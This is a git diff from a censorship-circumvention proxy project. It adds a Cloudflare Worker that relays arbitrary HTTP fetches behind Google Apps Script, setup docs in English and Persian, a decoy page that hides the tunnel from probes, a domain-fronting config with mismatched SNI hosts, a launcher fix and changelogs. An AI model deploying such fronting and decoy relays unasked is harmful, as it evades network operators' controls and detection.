سهمیهٔ زمان اجرای `Apps Script` در روز | ۹۰ دقیقه، اغلب گلوگاه | ۹۰ دقیقه، به‌ندرت گلوگاه | +| دیوار اجرای هر فراخوانی | ~۶ دقیقه، به‌ازای هر آدرس | ۳۰ ثانیه، به‌ازای هر تماس (اگر دسته‌بندی فعال شود، به‌ازای هر قطعه) | +| سقف اندازهٔ پاسخ | ~۵۰ مگابایت (مستندات `Apps Script`) | محدود به حافظهٔ `Worker` (۱۲۸ مگابایت در پلن رایگان)؛ در عمل با تبدیل `base64` چند ده مگابایت | +| حروف بزرگ/کوچک هدرهای پاسخ | همان‌طور که مبدأ فرستاده | کاملاً کوچک می‌شود (`Headers.forEach` در `Workers` نرمال می‌کند). 
فقط برای ابزارهای پایین‌دستی که نام هدر را حساس به حروف مقایسه می‌کنند مهم است؛ `mhrv-rs` خود حساس به حروف نیست. | +| پخش ویدیوی طولانی یوتیوب | قابل قبول (صخرهٔ ۶ دقیقه) | بدتر (صخرهٔ ۳۰ ثانیه) | +| سرعت تلگرام / گفتگو | پایه | محسوساً بهتر | +| ضدبات `Cloudflare` روی مقصد | یک `IP` دیتاسنتر | یک `IP` داخلی `Worker` (اغلب سخت‌گیرانه‌تر) | +| کش پاسخ روی `Spreadsheet` | موجود (اختیاری) | در این نسخه نیست | +| پیچیدگی استقرار | ۱ چیز برای نگه‌داری | ۲ چیز که باید همگام بمانند | + +اگر این مبادلات به نفع شماست، این نسخه را مستقر کنید. اگر نیست — یا حساب `Cloudflare` ندارید — روی `Code.gs` بمانید. + +## محدودیت مهم: این نسخه با `mode: "full"` کار نمی‌کند + +این فایل فقط مسیر **رلهٔ `HTTP`** (حالت‌های ۱ و ۲ در `CodeFull.gs`) را پورت می‌کند. عملیات تونل `TCP/UDP` خام (حالت‌های ۳ و ۴ در `CodeFull.gs` که برای `mode: "full"` و کاربری اپلیکیشن‌های موبایل مثل واتس‌اَپ روی اندروید لازم‌اند) در `Code.cfw.gs` پشتیبانی نمی‌شوند. اگر در حالت `full` هستید و `WhatsApp` کند است، این تغییر کمکی نمی‌کند — این مسئلهٔ متفاوتی است که نیاز به طراحی جداگانه دارد. + +
diff --git a/assets/cloudflare/README.md b/assets/cloudflare/README.md new file mode 100644 index 00000000..403fe81b --- /dev/null +++ b/assets/cloudflare/README.md @@ -0,0 +1,97 @@ +# Cloudflare Worker exit (alternative Apps Script backend) + +> *فارسی: [README.fa.md](README.fa.md)* + +This directory ships a **Cloudflare Worker** that pairs with [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) to give you a different shape of `apps_script` mode: + +``` +mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► target + ▲ thin auth + forward ▲ outbound fetch + base64 +``` + +The standard backend (`assets/apps_script/Code.gs`) does the outbound fetch from inside Apps Script directly. This variant makes Apps Script a thin relay and pushes the actual fetch to Cloudflare's edge. **mhrv-rs itself is unchanged** — same JSON envelope on the wire, same `mode: "apps_script"` in `config.json`, same `script_id`. The only thing that's different is what your deployed Apps Script does after it authenticates the request. + +Original idea: . This copy adds an `AUTH_KEY` check on the Worker, the decoy-on-bad-auth treatment from `Code.gs`, and a hop-loop guard. + +## When this is worth it + +✅ Browsing, page navigation, chat-style traffic — visibly snappier. Per-call latency drops from the ~250-500 ms Apps Script floor to ~10-50 ms at the CF edge. +✅ Telegram realtime — small frequent messages benefit most. +✅ Networks where the Apps Script *runtime* quota (90 min/day on consumer Google accounts) is what you hit before the URL-fetch count cap. GAS spends almost no time per call here. + +❌ **No `UrlFetchApp` daily-count relief today.** mhrv-rs's HTTP relay path emits a single-URL envelope per request, never the `q: [...]` batch shape, so each user request still consumes one GAS UrlFetchApp call regardless of which `Code.gs` variant is deployed. 
The `Code.cfw.gs` ↔ Worker path *is* batch-aware (chunks at 40, Worker fans out via `Promise.all`, costs `ceil(N / 40)` per batch instead of N), but that branch is unreachable from any shipping client. **Until/unless mhrv-rs grows HTTP-relay batching, the daily 20k-fetch ceiling is unchanged from `Code.gs`.** The ready batching support is left in place for forward compatibility — it costs nothing and goes live the day a batching client lands. +❌ YouTube long-form video — gets **worse**, not better. Apps Script allows ~6 min wall per execution; CF Workers cap at 30 s. The SABR cliff arrives sooner. Stay on `Code.gs` for YouTube-heavy use. +❌ Sites behind Cloudflare anti-bot (Twitter/X, OpenAI, etc.) — exit IP becomes a Workers IP, which CF's own anti-bot fingerprints as a worker-internal request. Often *stricter* than a Google IP. This is a separate problem from DPI bypass and neither variant fixes it. +❌ When/if HTTP-relay batching ships, the 30 s wall would apply to **the slowest URL in each chunk**, not per-URL — a single hung target could drag a 40-URL chunk to timeout. mhrv-rs's existing per-item retry would absorb this, but it's a behavioral change vs the per-URL `fetchAll` wall under `Code.gs`. (Inert today since no batching client exists.) + +## Setup + +You need three matching strings: an `AUTH_KEY` shared between `worker.js`, `Code.cfw.gs`, and your `mhrv-rs` `config.json`. Pick a strong random secret once and paste it into all three. + +### 1. Deploy the Worker + +1. Open → **Workers & Pages** → **Create** → **Hello World** → **Deploy**. +2. Click **Edit code**, delete the template, and paste the contents of [`worker.js`](worker.js). +3. Change the `AUTH_KEY` constant near the top of the file to your strong secret. +4. **Deploy**. Copy the `*.workers.dev` URL — you'll need it next. + +### 2. Deploy the Apps Script + +1. Open while signed into your Google account → **New project** → delete the default code. +2. 
Paste the contents of [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs). +3. Set both constants at the top: + - `AUTH_KEY` — the same secret you set in `worker.js`. + - `WORKER_URL` — the full `https://…workers.dev` URL of the Worker you just deployed (must include the scheme). +4. **Deploy → New deployment → Web app**: *Execute as* = **Me**, *Who has access* = **Anyone**. +5. Copy the **Deployment ID**. + +### 3. Point mhrv-rs at the Apps Script + +In `config.json` (or via the UI's config form): + +```json +{ + "mode": "apps_script", + "script_id": "PASTE_DEPLOYMENT_ID_HERE", + "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE" +} +``` + +That's it. mhrv-rs doesn't need to know Cloudflare exists; from its perspective, the `script_id` deployment behaves like any other. If you have multiple deployments (some plain, some CFW), `script_ids: [...]` round-robins across all of them and the parallel-relay fan-out still works. + +## Why three matching `AUTH_KEY`s + +- **mhrv-rs ↔ Apps Script**: prevents random POSTs to your `*.googleusercontent.com` deployment from being relayed. Probes that don't carry the key get the decoy HTML page (`DIAGNOSTIC_MODE = false` in `Code.cfw.gs`), so the deployment looks like a forgotten placeholder rather than a tunnel. +- **Apps Script ↔ Worker**: prevents random POSTs to your `*.workers.dev` Worker from being relayed if the Worker URL ever leaks. Without this check the Worker becomes an open HTTP-relay for arbitrary attackers. The upstream `mhr-cfw` Worker omits it; this copy adds it back. + +If you want compartmentalization (different secret on each leg), edit `Code.cfw.gs` to send a different `k` to the Worker than the one it accepts from mhrv-rs. The single-secret setup is the simplest correct configuration. + +## Verifying it works + +Same procedure as the standard backend: open a what-is-my-IP site (e.g. <https://ifconfig.me>) through the proxy.
You should see a Cloudflare-owned IP (since the actual fetch now exits Cloudflare's network), not a Google-owned one as you would with `Code.gs`. If you see your real IP, the proxy isn't being used; if you see a Google IP, you deployed `Code.gs` instead of `Code.cfw.gs`. + +The `Test` button in the desktop UI still works — it does a HEAD relay through whichever Apps Script deployment you configured. + +## Trade-off table at a glance + +| Axis | `Code.gs` (standard) | `Code.cfw.gs` (this variant) | +|---|---|---| +| Per-call latency floor | ~250-500 ms (GAS internal hop) | ~10-50 ms (CF edge) | +| Apps Script `UrlFetchApp`/day, **what mhrv-rs sends today** | 1 quota / request | 1 quota / request — same (mhrv-rs only emits single-URL envelopes) | +| Apps Script `UrlFetchApp`/day, **if a future client batches** | N quota (one per URL via `fetchAll`) | `ceil(N / 40)` quota (chunks at 40, Worker fans out via `Promise.all`) | +| CF Workers requests/day (free tier) | n/a | 100 000 — far above what GAS can feed it; not the binding ceiling | +| Apps Script runtime/day | 90 min, often binding | 90 min, rarely binding | +| Per-execution wall budget | ~6 min, per-URL | 30 s, per-call (would become per-chunk if batching ships) | +| Per-response size cap | ~50 MB (Apps Script doc'd) | bounded by Worker memory (128 MB free tier); ~tens of MB in practice with the base64 conversion | +| Response header casing | preserved as origin sent it | lowercased (Workers' `Headers.forEach` normalises). Matters only for downstream tools that compare header names case-sensitively; mhrv-rs is case-insensitive. 
| +| YouTube long-form playback | OK (6-min cliff) | WORSE (30-s cliff) | +| Telegram / chat snappiness | baseline | noticeably better | +| Cloudflare anti-bot on target | datacenter IP | worker-internal IP (often stricter) | +| Spreadsheet response cache | available (opt-in) | not in this variant | +| Deployment complexity | 1 thing to maintain | 2 things to keep in sync | + +If those trade-offs land on the right side for you, deploy this variant. If not — or if you don't have a Cloudflare account — stay on `Code.gs`. + +## Important limitation: not compatible with `mode: "full"` + +`Code.cfw.gs` only ports the HTTP-relay path (modes 1 + 2 in `CodeFull.gs`). The raw-TCP/UDP tunnel ops that `mode: "full"` depends on (modes 3 + 4 in `CodeFull.gs` — required for Android full-mode coverage of WhatsApp / Telegram / messengers / any non-HTTPS-MITM-able app) are **not** ported. If you're on full mode and looking for messenger speed-ups, this variant won't help — that's a different design that would need to ride on top of Cloudflare's TCP Sockets API + Durable Objects, with no equivalent for UDP. See the discussion in [issue #380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) for context. diff --git a/assets/cloudflare/worker.js b/assets/cloudflare/worker.js new file mode 100644 index 00000000..f672194b --- /dev/null +++ b/assets/cloudflare/worker.js @@ -0,0 +1,302 @@ +/** + * MHR-CFW Exit Worker — Cloudflare Workers companion to Code.cfw.gs. + * + * Architecture (alternative backend, opt-in): + * mhrv-rs → Apps Script (Code.cfw.gs) → THIS Worker → target site + * + * Apps Script in this configuration is a thin relay: it authenticates + * the inbound request from mhrv-rs, then forwards to this Worker. The + * Worker does the actual outbound fetch(es), base64-encodes the body, + * and returns the same JSON envelope shape the standard Code.gs would + * have returned. 
The mhrv-rs client is unaware that the work happened + * on Cloudflare — same `{u, m, h, b, ct, r}` request, same `{s, h, b}` + * response. + * + * Two request shapes are accepted: + * 1. Single: { k, u, m, h, b, ct, r } → { s, h, b } + * 2. Batch: { k, q: [{u,m,h,b,ct,r}, ...] } → { q: [{s,h,b} | {e}, ...] } + * + * The batch shape is what makes this design actually save Apps Script + * UrlFetchApp quota. Without it, Code.cfw.gs would have to do + * `UrlFetchApp.fetchAll(N worker calls)` to fan out an N-URL batch, + * which costs N quota — same as the standard Code.gs. With it, + * Code.cfw.gs does ONE fetch to this Worker (1 quota) and we fan out + * inside the Worker via Promise.all. For a typical mhrv-rs batch of + * 5-30 URLs that's a 5-30x reduction in GAS daily quota. + * + * Why bother: + * - Faster per-call latency (~10-50 ms at CF edge vs ~250-500 ms in + * Apps Script), which matters most for many small requests + * (Telegram realtime, page navigation chatter). + * - Apps Script *runtime* quota (90 min/day on consumer accounts) + * stretches further because GAS spends each call almost entirely + * on its single forward to the Worker rather than on body fetch + * + base64 + header munging. + * - With the batch shape (above), Apps Script *UrlFetchApp count* + * quota also stretches roughly Nx for an N-URL batch — typically + * 5-30x for mhrv-rs. + * + * What this does NOT change: + * - Cloudflare anti-bot challenges on the destination. The exit IP + * becomes a Workers IP (inside Cloudflare's network), which CF's + * own anti-bot can fingerprint as a worker-internal request — + * often *stricter* than a Google IP. This is a different problem + * than DPI bypass; see docs. + * - YouTube long-form streaming gets WORSE, not better. Apps Script + * allows ~6 min wall per execution; CF Workers cap at 30s wall. + * The SABR cliff arrives sooner. Keep the standard `apps_script` + * mode (Code.gs) for YouTube-heavy use. 
+ * - The 30s wall now applies to the *slowest URL in the batch* + * because Promise.all only resolves once every fetch finishes. + * mhrv-rs already retries failed batch items individually, so a + * single slow target degrades to a per-item timeout rather than + * a hard failure — but it's a real behavioural difference vs the + * per-URL wall under the standard Code.gs path. + * + * Deployment: + * 1. Cloudflare dashboard → Workers & Pages → Create → Hello World + * 2. Edit code → delete the template, paste this entire file + * 3. Change AUTH_KEY below to the same value you set in Code.cfw.gs + * AND in your mhrv-rs config.json (auth_key). All three must match. + * 4. Deploy. Note the *.workers.dev URL; paste it into Code.cfw.gs as + * WORKER_URL. + * + * SECURITY NOTE: this Worker accepts unauthenticated POSTs from anyone + * who knows the URL unless AUTH_KEY is changed. The check below is + * cheap; do not skip it. The point of the AUTH_KEY is to keep the + * Worker from becoming an open HTTP-relay for arbitrary attackers if + * its URL leaks. Same secret as Code.cfw.gs by convention — if you + * want compartmentalisation, use a different one and have Code.cfw.gs + * forward both keys. + * + * Hardened over the upstream mhr-cfw worker.js by adding the AUTH_KEY + * check and batch handling. Upstream credit: github.com/denuitt1/mhr-cfw. + */ + +const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; +const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; + +// Loop-prevention tag. The Worker tags its OUTBOUND request to the +// target with `x-relay-hop: 1` (see processOne). If a subsequent +// request comes back into the Worker with that header set, the Worker +// has been chained back to itself somehow — most likely the user's +// `item.u` resolved to this Worker's own URL. Bail out instead of +// fetching to avoid a stack-overflow loop. 
+// +// Note: Code.cfw.gs does NOT set this header on its GAS→Worker call +// (and could not check for it on inbound anyway — Apps Script's +// doPost event doesn't expose request headers). So this guard +// catches Worker-↔-Worker cycles, not GAS-↔-Worker cycles. The +// `targetUrl.hostname === selfHost` check in processOne is the +// primary defence for the common misconfiguration. +const RELAY_HOP_HEADER = "x-relay-hop"; + +// Soft cap on batch size. Cloudflare Workers allow up to 50 +// subrequests per invocation on the free tier (1000 on paid). We +// keep a margin for retries and internal CF traffic. mhrv-rs's +// typical batches are 5-30 URLs so this is rarely the binding limit. +// +// **Must match `WORKER_BATCH_CHUNK` in Code.cfw.gs.** If the GAS side +// chunks at a different size, oversized chunks here return a top-level +// error and the entire chunk's slots fail. Tune both together. +const MAX_BATCH_SIZE = 40; + +// Hop-by-hop headers and headers Cloudflare manages itself. Stripped +// before forwarding so the inbound request doesn't poison the outbound. +// Kept in sync with Code.cfw.gs / Code.gs SKIP_HEADERS so the Worker +// is correct as a defence-in-depth even when called directly (the +// AUTH_KEY check is the primary gate, but GAS scrubs first in the +// normal flow). +const SKIP_HEADERS = new Set([ + "host", + "connection", + "content-length", + "transfer-encoding", + "proxy-connection", + "proxy-authorization", + "priority", + "te", +]); + +export default { + async fetch(request) { + // Fail-closed if the deployer forgot to change AUTH_KEY from the + // template default. Without this guard a forgotten edit would + // accept any client that also happens to send the placeholder — + // effectively running as an open relay. Prefer a loud 500 over + // a silent open door. 
+ if (AUTH_KEY === DEFAULT_AUTH_KEY) { + return json({ e: "configure AUTH_KEY in worker.js" }, 500); + } + + if (request.method !== "POST") { + return json({ e: "method not allowed" }, 405); + } + + if (request.headers.get(RELAY_HOP_HEADER) === "1") { + return json({ e: "loop detected" }, 508); + } + + let req; + try { + req = await request.json(); + } catch (_err) { + return json({ e: "bad json" }, 400); + } + + if (!req || req.k !== AUTH_KEY) { + // Same shape as Code.cfw.gs unauthorized so downstream errors are + // uniform. The Worker URL is generally not user-discoverable; the + // GAS in front of it is the public surface, and probes hit GAS + // first. We don't bother with the decoy-HTML treatment here. + return json({ e: "unauthorized" }, 401); + } + + const selfHost = new URL(request.url).hostname; + + // Batch mode: { k, q: [{u,m,h,b,ct,r}, ...] }. Process all items in + // parallel via Promise.all. Per-item failures are per-item `{e}`s in + // the response array; the envelope itself stays 200 unless the batch + // is malformed at the top level. + if (Array.isArray(req.q)) { + if (req.q.length === 0) return json({ q: [] }); + if (req.q.length > MAX_BATCH_SIZE) { + return json({ + e: "batch too large (" + req.q.length + " > " + MAX_BATCH_SIZE + ")", + }, 400); + } + const results = await Promise.all( + req.q.map((item) => processOne(item, selfHost).catch((err) => ({ + e: "fetch failed: " + String(err), + }))) + ); + return json({ q: results }); + } + + // Single mode: { k, u, m, h, b, ct, r } + let result; + try { + result = await processOne(req, selfHost); + } catch (err) { + return json({ e: "fetch failed: " + String(err) }, 502); + } + if (result.e) { + // Per-item validation errors get HTTP 400 in single mode so + // mhrv-rs sees the same shape as in standard Code.gs ("bad url" + // etc are already client-error-coded there). 
+ return json(result, 400); + } + return json(result); + }, +}; + +/** + * Process one item, whether it came in as the top-level single + * request or as one slot of a batch. Returns a plain object — never + * throws to the caller; Promise.all's .catch above only triggers on + * exceptions from this function's own internals (programmer error). + * + * Result shape mirrors what Code.gs would return for the same item: + * - Success: { s: status, h: {...}, b: base64Body } + * - Validation / fetch failure: { e: "..." } + */ +async function processOne(item, selfHost) { + if (!item || typeof item !== "object") { + return { e: "bad item" }; + } + if (!item.u || typeof item.u !== "string" || !/^https?:\/\//i.test(item.u)) { + return { e: "bad url" }; + } + + let targetUrl; + try { + targetUrl = new URL(item.u); + } catch (_err) { + return { e: "bad url" }; + } + if (targetUrl.hostname === selfHost) { + return { e: "self-fetch blocked" }; + } + + const headers = new Headers(); + if (item.h && typeof item.h === "object") { + for (const [k, v] of Object.entries(item.h)) { + if (SKIP_HEADERS.has(k.toLowerCase())) continue; + try { + headers.set(k, v); + } catch (_err) { + // Worker rejects some headers (e.g. forbidden ones); skip + // rather than fail the whole item. + } + } + } + headers.set(RELAY_HOP_HEADER, "1"); + + const method = (item.m || "GET").toUpperCase(); + const fetchOptions = { + method, + headers, + redirect: item.r === false ? "manual" : "follow", + }; + + // Code.gs/UrlFetchApp tolerates a body on GET/HEAD (browsers don't + // do this, but custom clients sometimes do); Workers' native fetch + // throws TypeError if you set a body on a body-prohibited method. + // To match Code.gs's permissiveness, silently drop the body for + // those methods rather than failing the whole item. 
+ const bodyAllowed = method !== "GET" && method !== "HEAD"; + if (item.b && bodyAllowed) { + try { + const binary = Uint8Array.from(atob(item.b), (c) => c.charCodeAt(0)); + fetchOptions.body = binary; + if (item.ct && !headers.has("content-type")) { + headers.set("content-type", item.ct); + } + } catch (_err) { + return { e: "bad body base64" }; + } + } + + let resp; + try { + resp = await fetch(targetUrl.toString(), fetchOptions); + } catch (err) { + return { e: "fetch failed: " + String(err) }; + } + + const buffer = await resp.arrayBuffer(); + const uint8 = new Uint8Array(buffer); + + // Avoid call-stack overflow from String.fromCharCode.apply on big + // bodies — chunk the conversion. + let binary = ""; + const chunkSize = 0x8000; + for (let i = 0; i < uint8.length; i += chunkSize) { + binary += String.fromCharCode.apply(null, uint8.subarray(i, i + chunkSize)); + } + const base64 = btoa(binary); + + // Note: Headers.forEach delivers keys lowercased per the Fetch + // spec, whereas Code.gs's getAllHeaders preserves the origin's + // casing. mhrv-rs treats headers case-insensitively, but anything + // downstream that does a case-sensitive string compare will see + // a backend-dependent difference. There is no Workers API to + // recover the origin casing, so we accept the divergence. + const responseHeaders = {}; + resp.headers.forEach((v, k) => { + responseHeaders[k] = v; + }); + + return { + s: resp.status, + h: responseHeaders, + b: base64, + }; +} + +function json(obj, status = 200) { + return new Response(JSON.stringify(obj), { + status, + headers: { "content-type": "application/json" }, + }); +} diff --git a/assets/launchers/run.bat b/assets/launchers/run.bat index 11748d99..bf5939c3 100644 --- a/assets/launchers/run.bat +++ b/assets/launchers/run.bat @@ -60,10 +60,21 @@ if not "%UI_EXIT%"=="0" ( echo - running inside RDP or a VM without GPU acceleration echo - antivirus blocking the exe — whitelist the folder and retry echo. 
- echo Copy everything above and open an issue on: - echo https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues + echo You can still use mhrv-rs without the UI. Run the CLI directly: + echo. + echo mhrv-rs.exe + echo. + echo Set your config in %%APPDATA%%\mhrv-rs\config\config.json (or + echo place a config.json next to mhrv-rs.exe in this folder), then + echo point your browser proxy at 127.0.0.1:8085 (HTTP) or + echo 127.0.0.1:8086 (SOCKS5). The CLI is the same proxy without + echo the UI shell, so all functionality is available. + echo. + echo Falling back to the CLI now so you can keep using the proxy. + echo Press Ctrl+C in the CLI window to stop it. echo --------------------------------------------------- - pause + echo. + mhrv-rs.exe ) ) diff --git a/config.google-only.example.json b/config.direct.example.json similarity index 88% rename from config.google-only.example.json rename to config.direct.example.json index 890f966d..c0a95948 100644 --- a/config.google-only.example.json +++ b/config.direct.example.json @@ -1,5 +1,5 @@ { - "mode": "google_only", + "mode": "direct", "google_ip": "216.239.38.120", "front_domain": "www.google.com", "listen_host": "127.0.0.1", diff --git a/config.fronting-groups.example.json b/config.fronting-groups.example.json new file mode 100644 index 00000000..57bd8de9 --- /dev/null +++ b/config.fronting-groups.example.json @@ -0,0 +1,52 @@ +{ + "mode": "direct", + "google_ip": "216.239.38.120", + "front_domain": "www.google.com", + "listen_host": "127.0.0.1", + "listen_port": 8085, + "socks5_port": 8086, + "log_level": "info", + "verify_ssl": true, + "fronting_groups": [ + { + "name": "vercel", + "ip": "76.76.21.21", + "sni": "react.dev", + "domains": [ + "vercel.com", + "vercel.app", + "vercel.dev", + "vercel.live", + "vercel.sh", + "nextjs.org", + "now.sh", + "cursor.com", + "ai-sdk.dev" + ] + }, + { + "name": "fastly", + "ip": "151.101.1.140", + "sni": "www.python.org", + "domains": [ + "reddit.com", + 
"redditstatic.com", + "redditmedia.com", + "redd.it", + "githubassets.com", + "githubusercontent.com", + "pypi.org", + "fastly.com" + ] + }, + { + "name": "netlify", + "ip": "35.157.26.135", + "sni": "letsencrypt.org", + "domains": [ + "netlify.app", + "netlify.com" + ] + } + ] +} diff --git a/docs/changelog/v1.6.1.md b/docs/changelog/v1.6.1.md new file mode 100644 index 00000000..d5e72c8d --- /dev/null +++ b/docs/changelog/v1.6.1.md @@ -0,0 +1,4 @@ + +• پایداری چرخه‌ٔ سشن VPN در اندروید ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): پنج رفع باگ کوچک ولی واقعی در سرویس VPN اندروید: (۱) دکمهٔ Connect/Disconnect حالا روی state-flow `VpnState.isRunning` گیت میشه (با backstop ۱۲ ثانیه‌ای) به جای تایمر ثابت ۲ ثانیه — جلوی race condition بین Stop و Connect رو می‌گیره که قبلاً منجر به `Address already in use` می‌شد. (۲) `Tun2proxy.stop()` حالا با timeout ۲ ثانیه‌ای بسته شده تا اگر روی native call hang کنه، کل teardown thread رو نگه نداره. (۳) رفع نشت file descriptor بین `detachFd()` و `Thread.start()` — اگه start بخاطر OOM throw می‌کرد، fd یتیم می‌شد. (۴) doc-comment گمراه‌کننده در teardown اصلاح شد. (۵) handler crash trap حالا `Log.e` رو در try/catch می‌پیچه تا اگه خود لاگ throw کنه، handler بازگشتی نشه +--- +• Android VPN session lifecycle reliability ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): five small but real fixes in the Android VPN service. (1) Connect/Disconnect button is now gated on the `VpnState.isRunning` state flow with a 12 s backstop instead of a fixed 2 s `transitionCooldown` timer — closes the race window where users tapping Connect right after Stop would hit "Address already in use" because the previous teardown's listener-socket release hadn't completed yet. 
(2) `Tun2proxy.stop()` is now wrapped in a 2 s `join()` timeout — if the native call hangs, the bounded tun2proxy thread join + bounded `rt.shutdown_timeout` below it still release the listener port instead of holding the teardown thread. (3) File-descriptor leak fixed between `parcelFd.detachFd()` and `Thread.start()` — if `start()` threw (OOM under memory pressure), the detached fd had no owner and leaked for the process lifetime; now adopted into a fresh `ParcelFileDescriptor` purely so we can `close()` it. (4) Misleading teardown doc-comment rewritten — the "step 2 closes the TUN fd to force EBADF on read" claim has been factually wrong since `detachFd` landed; corrected so future debuggers don't chase a phantom safety net. (5) Recursive crash trap in `MhrvApp`'s uncaught-exception handler — `Log.e` is now wrapped in try/catch so a logd failure during exception logging falls through to the previous handler with the real exception diff --git a/docs/changelog/v1.6.2.md b/docs/changelog/v1.6.2.md new file mode 100644 index 00000000..402d8a5e --- /dev/null +++ b/docs/changelog/v1.6.2.md @@ -0,0 +1,4 @@ + +• رفع باگ "همهٔ دانلودها روی ۲۵۶ کیلوبایت قطع میشن" ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): در relay range-parallel، اگه validation هر chunk رد می‌شد (مثلاً Apps Script هدر `Content-Range` رو حذف می‌کرد، یا origin روی chunkهای بعدی به جای 206 یه 200 برمی‌گردوند)، fallback اشتباهی پاسخ probe (یعنی فقط ۲۵۶ کیلوبایت اول) رو به‌عنوان فایل کامل برمی‌گردوند. مرورگر `HTTP 200` با `Content-Length=262144` می‌دید و دانلود رو "کامل" تلقی می‌کرد. حالا fallback یک GET تک‌مرحله‌ای جدید بدون Range هدر می‌فرسته که Apps Script کل URL رو fetch کنه (تا سقف ۵۰ مگ). برای فایل‌های بزرگ‌تر کندتره از مسیر parallel، ولی پاسخ کامل می‌ده — که اون چیزی هست که اهمیت داره. 
۲ کاربر مستقل این رو ریپورت کردن (Ehsan، Recruit1992) +--- +• Fix "every download capped at 256 KB" bug ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): in range-parallel relay, when any chunk failed validation (e.g. Apps Script stripping the `Content-Range` header on follow-up chunks, or origin returning 200-instead-of-206 on later chunks), the fallback path silently returned the probe response (the first 256 KiB) as if it were the full file. Browsers saw `HTTP 200` with `Content-Length=262144` and treated the download as complete. The fallback now does a fresh single GET without the Range header, letting Apps Script fetch the full URL (up to its 50 MiB cap). Slower than the parallel path for large files, but produces a complete response — which is what matters. Two independent users (Ehsan, Recruit1992) reported this; closed-loop with both diff --git a/docs/changelog/v1.6.3.md b/docs/changelog/v1.6.3.md new file mode 100644 index 00000000..7be78d25 --- /dev/null +++ b/docs/changelog/v1.6.3.md @@ -0,0 +1,4 @@ + +• رفع باگ "نوتیفیکیشن سرور اندروید پورت اشتباه SOCKS5 رو نشون می‌داد" ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): با تنظیمات پیش‌فرض اندروید (`listenPort=8080`, `socks5Port=1081`)، نوتیفیکیشن می‌نوشت `Routing via SOCKS5 127.0.0.1:8081` که اشتباه بود — listener واقعی روی `1081` اجرا می‌شد. هر کاربری که پروکسی تلگرام رو روی پورت نوتیفیکیشن (8081) ست می‌کرد، در سکوت fail می‌شد. علت: تابع `buildNotif` به‌جای خوندن `cfg.socks5Port`، hardcode می‌کرد `proxyPort + 1`. حالا متن نوتیفیکیشن همون منطق elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` رو که در تنظیم listener واقعی استفاده می‌شه می‌خونه و علاوه بر SOCKS5، پورت HTTP رو هم نشون می‌ده: `HTTP 127.0.0.1:8080 · SOCKS5 127.0.0.1:1081`. 
۲ کاربر مستقل ریپورت کردن (vpnineh، l3est) +--- +• Fix "Android server notification showed wrong SOCKS5 port" bug ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): with the default Android config (`listenPort=8080`, `socks5Port=1081`), the foreground-service notification read `Routing via SOCKS5 127.0.0.1:8081` — wrong, since the real listener was on `1081`. Anyone configuring Telegram (or any per-app SOCKS5 client) against the notification value silently failed. Cause: `buildNotif` hardcoded `proxyPort + 1` instead of reading `cfg.socks5Port`. The notification now uses the same elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` that the actual listener uses, and shows both ports for clarity: `HTTP 127.0.0.1:8080 · SOCKS5 127.0.0.1:1081`. Two independent users (vpnineh, l3est) reported this diff --git a/docs/changelog/v1.6.4.md b/docs/changelog/v1.6.4.md new file mode 100644 index 00000000..0461620f --- /dev/null +++ b/docs/changelog/v1.6.4.md @@ -0,0 +1,4 @@ + +• رفع باگ "L7 multiplexer در Full mode batch نمی‌کنه" ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): در حالت Full، انتظار می‌رفت که چند op به یک batch HTTP request به Apps Script ترکیب بشن (`batch: 5 ops` یا `batch: 10 ops`)، ولی log نشون می‌داد همیشه `batch: 1 ops` — یعنی هر op جدا یه round-trip Apps Script می‌گرفت (که هر کدوم 2 تا 7 ثانیه طول می‌کشن). علت: loop دریافت پیام بلافاصله بعد از اولین message با `try_recv()` (non-blocking) صف رو drain می‌کرد، بدون pause برای جمع‌آوری بقیه ops. **Fix:** بعد از اولین op، یه پنجرهٔ ۸ میلی‌ثانیه‌ای باز می‌مونه تا opهای بعدی (مثل parallel fetches، HTTP/2 streams) همون batch رو پر کنن. ۸ms در مقابل ~۲ تا ۷ ثانیه RTT Apps Script اصلاً ناچیزه ولی efficiency batching رو برمی‌گردونه. 
ریپورت شده توسط w0l4i با log واضح +--- +• Fix "L7 multiplexer not batching in Full mode" bug ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): in `full` mode, multiple ops should coalesce into a single batched HTTP request to Apps Script (`batch: 5 ops` or `batch: 10 ops`), but logs showed `batch: 1 ops` consistently — each op got its own Apps Script round-trip (2-7 s each). Cause: the receive loop drained the channel via `try_recv()` (non-blocking) immediately after the first message arrived, with no window to let concurrent ops accumulate. **Fix:** after the first op lands, hold the buffer open for an 8 ms coalescing window so concurrent ops (parallel fetches, HTTP/2 stream openings, etc.) land in the same batch. 8 ms is rounding error against the ~2-7 s Apps Script RTT but restores the entire batching premise. Reported by w0l4i with a clean log snippet diff --git a/docs/changelog/v1.6.5.md b/docs/changelog/v1.6.5.md new file mode 100644 index 00000000..ab870666 --- /dev/null +++ b/docs/changelog/v1.6.5.md @@ -0,0 +1,10 @@ + +• اضافه شدن twitter.com به URL normalization اکس/توییتر ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): قبلاً normalization GraphQL URL فقط روی `x.com` کار می‌کرد. کاربری که از extension "Control Panel for Twitter" استفاده می‌کنه که همه‌چی رو به `twitter.com` redirect می‌کنه، URL shortening رو از دست می‌داد و درخواست‌هاش به Apps Script `URI Too Long` می‌گرفت. حالا match هر دو domain رو می‌گیره. ممنون از Parsa307 +• امکان کپی log در نسخهٔ اندروید 